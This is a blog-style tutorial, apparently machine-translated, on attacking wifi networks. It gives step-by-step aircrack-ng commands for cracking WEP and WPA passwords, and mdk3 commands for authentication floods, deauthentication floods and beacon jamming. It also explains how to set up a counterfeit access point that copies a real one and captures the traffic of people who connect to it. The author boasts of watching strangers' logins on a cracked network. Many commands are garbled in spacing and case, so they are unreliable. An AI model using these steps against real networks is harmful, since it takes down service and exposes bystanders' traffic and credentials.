Wireless Hacking: D. O.S and AP Spoofing

In today's society, wireless networks are becoming more and more developed. However, no matter whether it is enterprise or self-use wifi hotspots, it does not pay much attention to its security, in addition, some malicious personnel and commercial spies are also using wifi for malicious attacks and data theft.
Wireless networks are a breakthrough point for LAN. some may say that this is the most rogue attack method, but I would like to say that this is also the most effective method in malicious attacks.
To do this, you must first use the Wi-Fi password. This time, we will summarize how to obtain the password for the aircreak-ng series in Linux. To put it short, you can get what you want by following the steps!
No matter what system is used,Make sure to activate the NIC to monitor modeSo that the software can recognize
Iwconfig // view the NIC
Ifconfig start wlan0 // start wlan0 Nic
Airmon-ng start wlan0 // enable the NIC to monitor mode, which is generally mon0
WEP
Airodump-ng -- ivs-w log-c channel wlan0 // wep can use ivs to filter packets, fast
Aireplay-ng-3-B bssid-h clientMac mon0 // use ARPRequesr to increase the data volume quickly
Aircrack-ng ivs file // crack the captured ivs File
The wep command is sufficient.
WPA/WPA2
Airodump-ng-c channel-w log mon0 // wpa can capture packets normally
Aireplay-ng-0 3-a BSSID-c clientMAC wlan0 // initiate the Deauth attack to obtain the complete handshake. If the result is successful, the captured packets can be cracked.
The cap file captured by the aircrack-ng-w dictionary file // WPA cracking relies entirely on the dictionary and requires patience
In fact, it takes a long time to use a dictionary to create a hash table, but it is dozens of times as powerful as aircrack. I have time to write it out and share it with you.
OK. Now that we get the password, we can go to our topic-D. O.S.
In a wireless network environment, there are several common DOS Attacks:
Authentication Flood, Deauthentication Flood, Disassociation Flood, RF Jamming, Association Flood, etc.
Exploitation tools
This time we still rely on the powerful tool of BT5, mdk3. Now most wireless tools are developed using mdk3 as the basic kernel, so we don't need to talk about its performance.
For vrouters, we can launch Authentication Flood. The mdk3 parameter is a. This attack is a Flood attack against Wireless AP, also known as an identity Authentication attack. The principle is to initiate a large number of false connection requests to the AP. Once the number of requests exceeds the limits of the Wireless AP, the AP will automatically disconnect the existing connection, so that legal users cannot use the wireless network.
Mdk3 mon0 a-a ap mac address (BSSID)
 
 



At the same time, we can see that there are a large number of fake clients connecting to the AP.
MAC addresses are also randomly forged.
 
In this case, we can use-c to attack the specified channel,-a fixed bssid to attack, and-s to control the packet sending rate. Generally, the default value is 200 packets per second. In this way, the wireless network will crash in a few minutes, but the problem is, what should we do if we encounter an AP client that can carry a large number of users?
Don't worry, let's use the Deauthentication Flood we used when we obtained handshake. Remember, we used aireplay-ng.
-0 is used to initiate disconnection to obtain the handshake package. In fact, aireplay-ng can be started as long as the number of packets is not controlled and the random channel is used, but the efficiency is not high compared to mdk3.
This attack is not for AP, but for client MAC.
Mdk3 mon0 d
 
Attack started
 
As you can see, my network is intermittent. When I stop, the network will be restored.
 
In this case, we can use the-s parameter to speed up packet sending. This efficiency is very high. Generally, the client starts to disconnect the network when it starts to launch.
In addition, we can use-w (White List)-B (Black List) to add our mac addresses, so that we can make our forged AP never affected by attacks, in the blacklist and whitelist, you can write a separate mac or an absolute path of the file, and then write the mac to be added to the list in the file.
Counterfeit AP
First, we need a wireless network card that supports AP, or directly connect to a wireless router, or make a hotspot. There are many ap methods available on the Internet. You can find them by yourself.
 



 
I didn't modify the mac address to identify a false one.
As you can see, the above wireless network is a forged AP created by myself using a wireless network card. Its name, password, encryption method, working channel, and working mode are exactly the same as those of the original AP, the original AP is attacked and cannot be connected. I can only connect to this AP. Without knowing it, I will assume that the original AP is forged because it cannot be connected. At this time, we can capture the packets of our AP Nic. Then the data packet is analyzed.
In addition, we can launch false AP signals for interference.
Mdk3 mon0 B-g-c 11-h 7
 
At this time, we have begun to interfere with the AP with Channel 11.
In addition, we can also launch
Mdk3 mon0 B-n ESSID-g-c 11
Sends an interference message to a specified name (ESSID).-g is a standard 802.11 Wireless Network disguised as 54M.
Other D. O.S users can study it on their own. I will not talk much about it here due to space issues.
Other articles
Some people say that windows and linux have penetration problems. I personally think that both windows and linux have related software and can develop programs or scripts by myself, "hackers" don't care about the system or the environment. As long as there is a computer that can meet their own requirements, no matter what kind of system can launch an attack. This time I forged a Wireless AP, which was also made in windows.
We understand security and pay attention to security. This is what hackers learn from the constantly changing attack methods. Only by understanding attack methods can we better grasp every key point.
For example, the airodump-ng we use can capture packets to find malicious attackers and their packets.
If each of us can learn more and share more, our network security in China will get better and better. Finally, we must translate our articles from outside China, let's become a real freebufer!
In my previous article, "Analysis of wireless network data Snoop technology", undiscovered cap cracking data packets in wifi
 



The data packet after cracking is not 802.11 frames.
Beijing.55tuan.com, Haha, I don't know who is logging in. I am 111. It seems that there are at least 10 client terminals connected to this Intranet.
YY is finished. Don't spray me ~